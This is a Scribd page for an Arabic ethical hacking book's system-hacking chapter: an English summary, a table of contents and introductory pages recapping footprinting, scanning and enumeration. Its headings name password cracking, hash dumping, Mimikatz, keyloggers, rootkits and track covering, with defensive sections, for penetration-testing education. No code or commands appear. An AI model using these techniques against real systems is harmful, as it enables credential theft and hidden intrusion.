0% found this document useful (0 votes)
191 views202 pages

Hacking Book 005

This document discusses ethical hacking and penetration testing techniques. It covers common goals of hacking like exploiting systems and cracking passwords. Several hacking tools are described like Metasploit, which can be used to automate the hacking process. Specific attack methods are outlined such as dictionary attacks, brute force attacks, and stealing passwords using USB drives or keyloggers. The document provides information on authentication protocols in Windows and Linux and techniques for dumping password hashes from systems to crack passwords offline.

Uploaded by

abdallahtamer
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
191 views202 pages

Hacking Book 005

This document discusses ethical hacking and penetration testing techniques. It covers common goals of hacking like exploiting systems and cracking passwords. Several hacking tools are described like Metasploit, which can be used to automate the hacking process. Specific attack methods are outlined such as dictionary attacks, brute force attacks, and stealing passwords using USB drives or keyloggers. The document provides information on authentication protocols in Windows and Linux and techniques for dumping password hashes from systems to crack passwords offline.

Uploaded by

abdallahtamer
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 202

5

‫اﻟﮭﺎﻛﺮ اﻷﺧﻼﻗﻲ‬
(SYSTEM HACKING) ‫اﺧﺗراق اﻟﻧظﺎم‬

By

Dr.Mohammed Sobhy Teba


Exploitation
https://www.facebook.com/tibea2004
288

CONTENTS

294 ........................................................................................................................................................................................... ‫ ﻣﻘدﻣﮫ‬5.1

295 .......................................................................................................................................................... ‫ﻣﺎ ھو اھداف ﻋﻣﻠﯾﺔ اﻻﺧﺗراق؟‬

295 ........... ................................................................................................ (CEH Hacking Methodology) (CHM) ‫ﻣﻧﮭﺟﯾﺔ اﻟﻘرﺻﻧﺔ‬

296 ..................... ................................................................................................ ‫؟‬System Hacking ‫ او‬Exploitation ‫ﻣﺎ ھو اﻻﺧﺗراق‬

296 ................. ................................................................................................................................................................ Metasploit 5.2

298 ............ ................................................................................................Mastering the Metasploit Console (MSFCONSOLE)

299 .. ................................................................:‫ ھﻲ ﻛﺎﻻﺗﻰ‬msfconsole ‫ﺑﻌض اﻷواﻣر اﻟﺷﺎﺋﻌﺔ اﻟﺗﻲ ﺳوف ﻧﺳﺗﺧدﻣﮭﺎ ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ وﺣدة اﻟﺗﺣﻛم‬

299 ......... ................................................................................................MSFCONSOLE ‫ﺳوف ﻧﻘوم اﻻن ﺑﺗﻧﻔﯾذ ﻋﻣﻠﯾﺔ اﺧﺗراق ﺑﺎﺳﺗﺧدام‬

305 .................. ................................................................ Mastering Armitage, the graphical management tool for Metasploit

306 ........... ................................................................................................‫ﻟﻣﺎذا ﻧﺗﻌرف ﻋﻠﻰ ﺧﻣس أدوات وﻋﻧدﻧﺎ اداه واﺣده ﻓﻘط ﺗﻌﻣل ﻛل ھذا؟‬

308 ...............................................................................................................................Mastering the Metasploit CLI (MSFCLI)

310 .............................................................................................................................................................Metasploitable MySQL

310 ... ................................................................................................................................................................Metasploitable PDF

311 ............. ................................................................................................................................ Implementing browser_autopwn

312 .. ................................................................................................................................................................ Cracking passwords 5.3

312 ..............................................................................................................................‫(؟‬cracking password) ‫ﻣﺎ ھو ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‬

313 . ................................................................................................................................ Password Complexity ‫ﺗﻌﻘﯾدات ﻛﻠﻣﺎت اﻟﺳر‬

313 ..........................................................................................................................................................Microsoft Authentication

313 ....... ................................................................................................................................................................ SAM Database

317 .......................................................................................................................................................... NTLM Authentication

319 ................. ................................................................................................................................................................Kerberos

319 ..................... ................................................................................................................................................................Salting

320 ................................................................................................................................................................ Linux Authentication

321 .........................................................................................................................................................Password Management

322 ............. ................................................................................................Password Cracking Techniques ‫ﺗﻘﻧﯾﺎت ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‬

322 ................................................................................................................................................................ Dictionary Attacks

322 .. ................................................................................................................................ Brute forcing attacks ‫ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‬

323 .................... ................................................................................................................................Hybrid Attack ‫اﻟﮭﺟوم اﻟﮭﺟﯾن‬

323 ....... ................................................................................................................................................................Syllable Attack

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


289

323 ... ................................................................................................................................Rule-based Attack ‫ھﺟوم ﻣﺳﺗﻧد إﻟﻰ ﻗواﻋد‬

323 ....................... ................................................................................................................................Types of Password Attacks

324 .. ................................................................................................................................Passive Online Attack: Wire Sniffing

325 ........................................................................................Passive Online Attack: Man-in-the-Middle and Replay Attack

326 ..........................................................................................................................Active Online Attack: Password Guessing

327 ............ ................................................................................................ Active Online Attack: Trojan/Spyware/Keylogger

327 ..................... ................................................................................................ Active Online Attack: Hash Injection Attack

328 ......... ................................................................................................................................Offline Attack: Rainbow Attacks

329 ..... ................................................................................................Tools to Create Rainbow Tables: Winrtgen and Rtgen

331 ..................... ................................................................................................Offline Attack: Distributed Network Attacks

333 ........................................................................................................................................................ Non-Electronic Attacks

334 . ................................................................................................................................................................ Default Passwords

335 .............................................................................................................................. Manual Password Cracking (Guessing)

336 ................ ................................................................................................................................ Automatic Password Cracking

337 ....................................................................................................................... Performing Automated Password Guessing

337 .. ................................................................................................................................Stealing Passwords Using Usb Drives

339 ... ................................................................................................................................Stealing Passwords Using Keylogger

339 ..............................................................................................................................Offline Password Attacks (HASH Attack)

339 .............. ................................................................................................Windows Hash Dumping: Pwdump and Fgdump

341 ................. ................................................................................................ Extracting the Hashes from the SAM (Locally)

344 .............. ................................................................................................ Extracting Windows Password Hashes Remotely

346 ................ ................................................................................................................................Cracking Simple Lm Hashes

349 ....... ................................................................................................................................................................Pass the HASH

349 ... ................................................................................................JTR (John the Ripper): King of the Password Crackers

352 ............ ................................................................................................................................................................L0phtCrack

356 ................ ................................................................................................................................................................Ophcrack

358 ........... ................................................................................................................................................................ Cain & Abel

358 ........ ................................................................................................................................................................Rainbowcrack

360 ............... ................................................................................................Mimikatz Tool to Recover Plain Text Passwords

362 ................................................................................................Password Resetting: The Building and the Wrecking Ball

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


290

365 ..............................................................................................Online Password Attack: Gaining Access to Remote Services

365 .............................................................................................................................THC-Hydra Password Cracker (Hydra)

369 ...................... ................................................................................................Medusa: Gaining Access to Remote Services

371 ............ ................................................................................................Ncrack — Network Authentication Cracking Tool

374 ................... ................................................................................................Password Profiling (Word list or Dictionary file)

375 ................. ................................................................................................................................ CeWL (Password Profiling)

376 .................... ................................................................................................................................................................Crunch

379 ..... ................................................................................................................................ Download Wordlists from the Web

379 .. ................................................................................................Hashcat and oclHashcat (Password Cracking with CUDA)

380 ...................... ................................................................................................................................ Hashcat and OclHashcat

385 ............. ................................................................................................................................................................OclHashcat

385 .............. ................................................................................................................................Other Password Cracking Tools

386 ........... ................................................................................................................................ ‫ﺑﻌض اﻟﺗﻘﻧﯾﺎت اﻷﺧرى ﻓﻲ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‬

386 ... ................................................................................................................................Windows Credentials Editor (WCE)

387 ............... ................................................................................................................................................................ CmosPwd

387 ... ................................................................................................................................ Physical access attacks with sucrack

388 ........ ................................................................................................Bypass Windows Logons with the Utilman.exe Trick

390 ......... ................................................................................................................................ LM Hash Backward Compatibility

391 ............................................................................................... (How to Disable LM HASH) LM HASH ‫ﻛﯾﻔﯾﺔ اﻟﻐﺎء ﺗﻔﻌﯾل اﺳﺗﺧدام‬

392 ...... ................................................................ How to Defend Against Password Cracking ‫ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟﻣﺎت ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‬

393 ......... ................................................................Implement and Enforce A Strong Security Policy ‫ﺗﻧﻔﯾذ وﻓرض ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ‬

394 . ................................................................................................................................................................ Escalating Privileges 5.4

394 ...............................................................................................................................................................Privilege Escalation

394 ........ ................................................................................................ Privilege Escalation Tool: Active@ Password Changer

395 .................... ................................................................................................................................Using Impersonation Tokens

397 .............. ................................................................................................................................Other Privilege Escalation Tools

397 ..... ................................................................ (How to Defend Against Privilege Escalation) ‫ﻛﯾف ﺗداﻓﻊ ﺿد ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‬

398 ............................................................................................................................................................. Executing Applications 5.5

398 ......................................................................................................................................................... Executing Applications

398 ...... ................................................................................................................................Executing Applications: RemoteExec

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


291

401 ................... ................................................................................................Executing Applications: DameWare NT Utilities

401 .................. ................................................................................................................................................................Keyloggers

402 .............................................................................................................................................................. Keylogger‫ﻛﯾف ﯾﻌﻣل ال‬

402 ................... ................................................................................................(Types Of Keystroke Loggers) Keylogger ‫أﻧواع‬

405 ............................... (Methodology Of Attacker In Using Remote Keylogger) ‫ ﻋن ﺑﻌد‬Keyloggers ‫ﻣﻧﮭﺟﯾﺔ اﻟﮭﺎﻛرز ﻓﻲ اﺳﺗﺧدام‬

405 ................... ................................................................................................................................ Acoustic/CAM Keyloggers

406 ............. ................................................................................................................................................................Keyloggers

407 .............. ................................................................................................................................Keylogger: Spytech SpyAgent

410 ......... ................................................................................................................................ Keylogger: All in One Keylogger

411 ....................... ................................................................................................................................Keyloggers for Windows

411 ............... ................................................................................................ Keylogger for MAC: Amac Keylogger for MAC

412 ............................................................................................................................................................. Keyloggers for MAC

412 .................... ................................................................................................................................ List of Linux Key Loggers

413 ........................................................................................................................................................... Hardware Keyloggers

414 ...................... ................................................................................................................................................................Spyware

415 .............................................................................................. ‫؟‬What Does the Spyware Do ‫ﻣﺎ اﻟذي ﯾﻣﻛن أن ﯾﻔﻌﻠﮫ ﺑراﻣﺞ اﻟﺗﺟﺳس‬

415 ... ................................................................................................................................ (Types of Spyware) ‫أﻧواع ﺑراﻣﺞ اﻟﺗﺟﺳس‬

429 ......... ................................................................................................................................ How to Defend Against Keyloggers

430 ..... ................................................................................................................................................................Anti-Keyloggers

431 ............. ................................................................................................................................ How to Defend Against Spyware

433 ............................................................................................................................ Key Scan and Lockout Keylogger in Linux

433 ............ ................................................................................................................................ Key Logging with Meterpreter

435 ............... ................................................................................................................................................................Hiding Files 5.6

435 ...................... ................................................................................................................................................................ Rootkits

436 ... ................................................................................................................................................................Types of Rootkits

439 ................................................................................................................................ ‫ ﻛﯾف ﯾﻌﻣل اﻟروت ﻛﯾت؟‬How Rootkits Work

440 ............. ................................................................................................................................................................Rootkit: Fu

440 ..... ................................................................................................................................................................ Rootkit: KBeast

441 ..................... ................................................................................................ Hacker Defender: It is Not What You Think

444 . ................................................................................................................................................................ Detecting Rootkits

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


292

445 .......... ................................................................................................Steps For Detecting Rootkits ‫اﻟﺧطوات ﻻﻛﺗﺷﺎف اﻟروت ﻛت‬

446 .................. ................................................................................................................................Defending Against Rootkits

447 ............................................................................................................................................................ Anti-Rootkit: Stinger

447 ..................... ................................................................................................................................ Anti-Rootkit: UnHackMe

448 .................... ................................................................................................................................ Anti-Rootkit: Other Tools

448 .... ................................................................................................................................................................NTFS Data Stream

450 ........................................................................................NTFS Stream Manipulation (Hiding Trojan in NTFS Stream)

451 ....... ................................................................................................................................ Hiding Files Using NTFS Streams

452 .. ................................................................................................................................ Ntfs Stream Detector: StreamArmor

453 ... ................................................................................................................................NTFS Stream Detector: Other Tools

453 ........... ................................................................................................................................................................Steganography

455 .............. ................................................................................................................................Application of Steganography

457 ........... ................................................................................................................................Classification of Steganography

458 .......................................................................................................................Steganography Techniques ‫ﺗﻘﻧﯾﺎت أﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‬

461 .................. ................................................................................................................................How Steganography Works

461 ........................................................................................................................................................Types of Steganography

462 .......................................................................................... "Data Embedding Security Schemes" ‫ﻣﺧططﺎت أﻣن ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت‬

463 ........................................................................................................................... Whitespace Steganography Tool: SNOW

464 ........................................................................................................................................................... Image Steganography

469 ..................... ................................................................................................................................Document Steganography

470 ............................................................................................................................................................ Video Steganography

471 ............................................................................................................................................................Audio Steganography

474 ...........................................................................................................................................................Folder Steganography

475 ................. ................................................................................................................................ Spam/Email Steganography

476 ..... ................................................................................................Natural Text Steganography: Sams Big G Play Maker

476 .......... ................................................................................................ (Issues in Information Hiding)‫ﻣﺳﺎﺋل ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‬

477 ............ ................................................................................................................................................................Steganalysis

478 .............. ................................................................................................ Steganalysis Methods/Attacks on Steganography

479 .......................................................................................................................... Detecting Text and Image Steganography

479 ........................................................................................................................ Detecting Audio and Video Steganography

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


293

479 ............... ................................................................ Steganography Detection Tool: Gargoyle Investigator Forensic Pro

480 ............ ................................................................................................................................Steganography Detection Tools

480 ........ ................................................................................................................................................................Covering Tracks 5.7

481 ................... ................................................................................................................................Covering Tracks ‫ﺗﻐطﯾﺔ اﻟﻣﺳﺎرات‬

482 ................... ................................................................................................................................ Disabling Auditing: Auditpol

483 ............. ................................................................................................................................Covering Tracks Tool: CCleaner

484 ...... ................................................................................................................................ Covering Tracks Tool: MRU-Blaster

485 ............................................................................................................................................................... Track Covering Tools

485 ..... ................................................................................................................................................................Penetration testing 5.8

485 ... ................................................................................................................................................................ Password Cracking

486 ... ................................................................................................................................................................Privilege Escalation

487 ...............................................................................................................................................................Executing Application

487 ................ ................................................................................................................................................................Hiding Files

488 ........ ................................................................................................................................................................Covering Tracks

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪294‬‬

‫‪ 5.1‬ﻣﻘﺪﻣﮫ‬

‫ﯾرﻛز اﻟﻛﺗﺎب ﻋﻠﻰ اﻷﺳﺎﺳﯾﺎت‪ ،‬وأﻧﮭﺎ ﺑﻣﺛﺎﺑﺔ اﻹﻧذار اﻟﻧﮭﺎﺋﻲ‪ ،‬ﻓﻣن اﻷھﻣﯾﺔ أن ﻧؤﻛد ﻋﻠﻰ أھﻣﯾﺔ اﺳﺗﻛﻣﺎل اﻟﺧطوات اﻟﺳﺎﺑﻘﺔ ﻗﺑل إﺟراء اﻻﺳﺗﻐﻼل‬
‫او اﻻﺧﺗراق‪ .‬ﺣﯾث ﯾﻛون ﻣﻐرﯾﺎ ﺗﺟﺎوز ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع واﻟﻔﺣص واﻟﺗﻌداد واﻟﻘﻔز ﻣﺑﺎﺷرة إﻟﻰ ھذا اﻟﺟزء‪ ،‬وھذا ﻋﻠﻰ ﻣﺎ ﯾرام ﻓﻲ اﻟوﻗت‬
‫اﻟراھن‪ ،‬وﻟﻛن إذا ﻛﻧت ﻣن أي وﻗت ﻣﺿﻰ ﻟﺗﻌزﯾز ﻣﮭﺎراﺗك ﻓﯾﺟب ﻋﻠﯾك ﺗﺟﺎوز ﻣﺳﺗوى ‪ ،script kids‬وﺳوف ﺗﺣﺗﺎج ﻹﺗﻘﺎن اﻟﺧطوات‬
‫اﻷﺧرى ﻛذﻟك‪ .‬ﻓﺈن ﻋدم اﻟﻘﯾﺎم ﺑذﻟك ﻟﯾس ﻓﻘط ﺗﺣد ﺑﺷدة ﻣن ﻗدرﺗك ﻟﺗﻧﺿﺞ ﺑﻣﺛﺎﺑﺔ ﻣﺧﺗﺑر اﻻﺧﺗراق ﻟﻛﻧﮭﺎ ﺳﺗﻛون أﯾﺿﺎ ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف إﻋﺎﻗﺔ‬
‫اﻟﻧﻣو اﻟﺧﺎص ﺑك ﻛﺧﺑﯾر اﻻﺳﺗﻐﻼل‪ .‬ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع واﻟﻔﺣص واﻟﺗﻌداد ﺗﺳﺎﻋدك ﻋﻠﻰ اﺣﻼل اﻟﻧظﺎم وﺗوﺟﯾﮫ اﻻﺳﺗﻐﻼل‪ .‬ﻗﺑل اﻟﺑدء ﻣﻊ ﻧظﺎم‬
‫اﻟﻘرﺻﻧﺔ واﻻﺧﺗراق‪ ،‬دﻋوﻧﺎ ﻧذھب ﺳرﯾﻌﺎ اﻟﻰ اﻟﻣراﺣل اﻟﺗﻲ ﻣررﻧﺎ ﺑﮭﺎ واﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﺣﺗﻰ اﻵن‪ .‬ﻗﺑل ھذه اﻟوﺣدة‪ ،‬ﻧﺎﻗﺷﻧﺎ اﻻﺗﻲ‪:‬‬
‫‪ -1‬ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع )‪(Footprinting‬‬
‫‪ Footprinting‬ھو ﻋﻣﻠﯾﺔ ﺗﺟﻣﯾﻊ ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣﺗﻌﻠﻘﺔ ﺑﺑﯾﺋﺔ ﺷﺑﻛﺔ اﺗﺻﺎل ﻣﻌﯾﻧﺔ‪ .‬ﻋﺎدة ﯾﺗم ﺗطﺑﯾﻖ ھذه اﻟﺗﻘﻧﯾﺔ ﻟﻐرض اﯾﺟﺎد ﺳﺑل ﻻﻗﺗﺣﺎم ﺑﯾﺋﺔ‬
‫اﻟﺷﺑﻛﺔ‪ .‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻣﮭﺎﺟﻣﺔ اﻟﻧظﺎم‪ ،‬وﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ أﯾﺿﺎ ﻓﻲ اﻟﺣﻣﺎﯾﺔ‪ .‬ﻓﻲ ﻣرﺣﻠﺔ ‪ ،Footprinting‬إن اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف‬
‫ﺗﻌرﯾﻔﻲ ﻟﻠﻣﻧظﻣﺔ اﻟﻣﺳﺗﮭدﻓﺔ‪ ،‬ﻣﻊ ﻣﻌﻠوﻣﺎت ﻣﺛل ﻧطﺎق ﻋﻧﺎوﯾن ‪ ،IP‬اﻷﺳﻣﺎء )‪ ،(namespace‬واﺳﺗﺧدام اﻟﻣوظﻔﯾن ﻟﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪.‬‬
‫‪ Footprinting‬ﯾﺣﺳن ﺳﮭوﻟﺔ اﺧﺗراق اﻟﻧظم ﻣن ﺧﻼل اﻟﻛﺷف ﻋن ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ اﻟﻧظﺎم‪ .‬ﺗﺣدﯾد اﻟﮭدف وﻣوﻗﻌﮫ ھﻲ اﻟﺧطوة اﻷوﻟﯾﺔ‬
‫اﻟﻣوﺟودة ﻓﻲ‪. Footprinting‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﺻﻔﺣﺔ اﻟوﯾب ﻣن اﻟﻣﻧظﻣﺔ ﻧﻔﺳﮭﺎ ﻗد ﺗوﻓر ﺳﯾر اﻟﻣوظﻔﯾن أو ﻣﻌﻠوﻣﺎت ﺷﺧﺻﯾﮫ‪ ،‬اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﮭﺎﻛر‬
‫ﺑﺎﺳﺗﺧداﻣﮫ ﻟﻠﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ﻟﻠوﺻول إﻟﻰ اﻟﮭدف‪ .‬إﺟراء اﺳﺗﻌﻼم ‪ Whois‬ﻋن ﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﯾوﻓر ﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺎت‬
‫اﻟﻣرﺗﺑطﺔ وأﺳﻣﺎء اﻟﻧطﺎﻗﺎت ذات اﻟﺻﻠﺔ ﻟﻣﻧظﻣﺔ ﻣﻌﯾﻧﺔ‪.‬‬
‫‪ -2‬ﻋﻣﻠﯾﺔ اﻟﻔﺣص )‪(Scanning‬‬
‫‪) Scanning‬اﻟﻔﺣص( ھو إﺟراء ﻟﺗﺣدﯾد اﻟﻣﺿﯾﻔﯾن اﻟﻧﺷطﺎء ﻋﻠﻰ اﻟﺷﺑﻛﺔ او ﻣﺎ ﯾﺳﻣﻰ ﺒ ‪ ،live hosts‬إﻣﺎ ﻟﻐرض ﺗﻘﯾﯾم أﻣن اﻟﺷﺑﻛﺎت أو‬
‫ﻟﻣﮭﺎﺟﻣﺗﮭم‪ .‬ﻓﻲ ﻣرﺣﻠﺔ اﻟﻔﺣص‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺟد ﻣﻌﻠوﻣﺎت ﺣول ﺗﻘﯾﯾم اﻟﻣﺳﺗﮭدف ﻣن ﺧﻼل ﻋﻧﺎوﯾن ‪ IP‬اﻟﺧﺎﺻﺔ ﺑﮫ اﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول إﻟﯾﮫ‬
‫ﻋﺑر اﻹﻧﺗرﻧت‪ .‬اﻟﻔﺣص ﯾﮭﺗم أﺳﺎﺳﺎ ﺑﺗﺣدﯾد اﻟﻧظم ﻋﻠﻰ اﻟﺷﺑﻛﺔ وﺗﺣدﯾد اﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﻛل ﻛﻣﺑﯾوﺗر‪.‬‬
‫ﺑﻌض اﻹﺟراءات ﻣﺛل ﻓﺣص اﻟﻣﻧﺎﻓذ‪/‬اﻟﺑورﺗﺎت اﻟﻣﯾﻧﺎء و‪ Ping swap‬ﺗﻘدم ﻟك ﻣﻌﻠوﻣﺎت ﺣول اﻟﺧدﻣﺎت اﻟﻣﻘدﻣﺔ ﻣن ﻗﺑل اﻟﻣﺿﯾﻔﯾن اﻟﺣﯾﺔ اﻟﺗﻲ‬
‫ﺗﻧﺷط ﻋﻠﻰ اﻹﻧﺗرﻧت‪ ،‬وﻋﻧﺎوﯾن ‪ IP‬اﻟﺧﺎﺻﺔ ﺑﮭﺎ‪ .‬إﺟراء اﻟﻔﺣص ورﺳم اﻟﺧراﺋط اﻟﻌﻛﺳﯾﺔ ﯾرﺟﻊ ﻟك ﻣﻌﻠوﻣﺎت ﺣول ﻋﻧﺎوﯾن ‪ IP‬اﻟﺗﻲ ﻻ ﺗﻌﯾﯾن‬
‫إﻟﻰ اﻟﻣﺿﯾﻔﯾن اﻟﺣﻲ؛ وھذا ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻟﺟﻌل اﻓﺗراﺿﺎت ﺣول اﻟﻌﻧﺎوﯾن اﻟﻣﻣﻛﻧﺔ‪.‬‬
‫‪ -3‬ﻋﻣﻠﯾﺔ اﻟﺗﻌداد )‪(Enumeration‬‬
‫‪) Enumeration‬اﻟﺗﻌداد( ھو أﺳﻠوب اﻟﺗﺣﻘﯾﻖ ﻣن اﻟﺗطﻔل ﻓﻲ ﺗﻘﯾﯾم اﻟﮭدف ﻣن ﺧﻼﻟﮭﺎ اﻟﻣﮭﺎﺟﻣﯾن ﯾﻘوﻣوا ﺑﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت ﻣﺛل ﻗواﺋم ﻣﺳﺗﺧدم‬
‫اﻟﺷﺑﻛﺔ‪ ،‬ﺟداول اﻟﺗوﺟﯾﮫ‪ ،‬وﺑﯾﺎﻧﺎت ﺑروﺗوﻛول إدارة اﻟﺷﺑﻛﺔ)‪ . (SNMP‬ھذا اﻷﻣر ﺿروري ﻷن اﻟﻣﮭﺎﺟم ﯾﻌﺑر اﻻﻗﺎﻟﯾم اﻟﻣﺳﺗﮭدﻓﺔ ﻟﻛﺷف‬
‫اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺔ‪ ،‬وﻣﺷﺎرﻛﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬واﻟﺟروب‪ ،‬واﻟﺗطﺑﯾﻘﺎت‪ ،‬و‪.banners‬‬
‫ھدف اﻟﻣﮭﺎﺟم ھو ﺗﺣدﯾد ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدم اﻟﺻﺎﻟﺣﺔ أو اﻟﻣﺟﻣوﻋﺎت ﺣﯾث ﯾﻣﻛن أن ﯾﺑﻘﻰ ﻏﯾر واﺿﺢ ﻋﻧد اﺧﺗراق اﻟﻧظﺎم‪ .‬اﻟﺗﻌداد ﯾﺷﻣل إﺟراء‬
‫اﺗﺻﺎﻻت ﻧﺷطﺔ ﻟﻧظﺎم اﻟﮭدف أو إﺧﺿﺎﻋﮭﺎ ﻟﺗوﺟﯾﮫ اﻻﺳﺗﻔﺳﺎرات‪ .‬ﻋﺎدة‪ ،‬ﻧظﺎم اﻟﺗﻧﺑﯾﮫ واﻷﻣن ﺳوف ﯾﻘوم ﺑﺗﺳﺟﯾل ﻣﺛل ھذه اﻟﻣﺣﺎوﻻت ﻓﻲ‬
‫ﻣﻠﻔﺎت اﻟﺳﺟل‪ .‬ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻛون اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم ﺟﻣﻌﮭﺎ ھو ﻣﺎ ﻗد ﯾﺳﺗﮭدﻓﮭﺎ اﻟﻣﮭﺎﺟم ﻗد ﺗﻛون ﻋﺎﻣﮫ‪ ،‬ﻣﺛل ﻋﻧوان ‪DNS‬؛ وﻣﻊ ذﻟك‪ ،‬ﻓﻣن‬
‫اﻟﻣﻣﻛن أن ﯾﺗﻌﺛر اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻣﺷﺎرﻛﺔ ‪ IPC‬ﻋن ﺑﻌد‪ ،‬ﻣﺛل ‪ IPC$‬ﻓﻲ وﯾﻧدوز‪ ،‬واﻟﺗﻲ ﯾﻣﻛن ﺑﺣﺛﮭﺎ ﻣﻊ ‪ Null Session‬واﻟﺗﻲ ﺗﺳﻣﺢ ﺑﺎن ﯾﺗم‬
‫ﺗﻌداد اﻟﻣﺷﺎرﻛﺔ واﻟﺣﺳﺎﺑﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪295‬‬

‫ﻣﺎ ھو اھداف ﻋﻣﻠﯾﺔ اﻻﺧﺗراق؟‬


‫ﻛل ﺟﻧﺎﺋﻲ ﯾرﺗﻛب ﺟرﯾﻣﺔ ﻣﺎ ﻟﺗﺣﻘﯾﻖ ھدف ﻣﻌﯾن‪ .‬وﺑﺎﻟﻣﺛل‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم أﯾﺿﺎ ﻟدﯾﮭم ﺑﻌض اﻷھداف وراء اﻟﮭﺟﻣﺎت ﻋﻠﻰ أداء اﻟﻧظﺎم‪.‬‬
‫ﻗد ﯾﻛون ﻣﺎ ﯾﻠﻲ ﺑﻌض اﻷھداف ﻣن اﻟﻣﮭﺎﺟﻣﯾن ﻓﻲ ارﺗﻛﺎب ھﺟﻣﺎت ﻋﻠﻰ اﻟﻧظﺎم‪ .‬وﯾﺑﯾن اﻟﺟدول اﻟﺗﺎﻟﻲ ﺑﻌض اھداف اﻟﻣﮭﺎﺟﻣﯾن ﻓﻲ ﻣراﺣل‬
‫ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﻘرﺻﻧﺔ واﻟﺗﻘﻧﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻟﺗﺣﻘﯾﻖ ھذا اﻟﮭدف‪.‬‬

‫ﻣﻧﮭﺟﯾﺔ اﻟﻘرﺻﻧﺔ )‪(CEH HACKING METHODOLOGY) (CHM‬‬


‫ﻗﺑل ﻗرﺻﻧﺔ اﻟﻧظﺎم‪ ،‬ﯾﺳﺗﺧدم اﻟﻣﮭﺎﺟم ﺗﻘﻧﯾﺎت ‪ Footprinting‬و‪ Scanning‬واﻟﺗﻌداد ﻟﻠﻛﺷف ﻋن اﻟﻣﻧطﻘﺔ اﻟﻣﺳﺗﮭدﻓﺔ ﻣن اﻟﮭﺟوم وﻧﻘﺎط‬
‫اﻟﺿﻌف اﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون اﻟﻣداﺧل ﻟﻠﻣﮭﺎﺟﻣﯾن‪ .‬ﺑﻣﺟرد ﺣﺻول اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻼزﻣﺔ‪ ،‬ﻓﺎﻧﮫ ﯾﺑدأ اﻟﻘرﺻﻧﺔ‪ .‬ﻋﻠﻰ ﻏرار‬
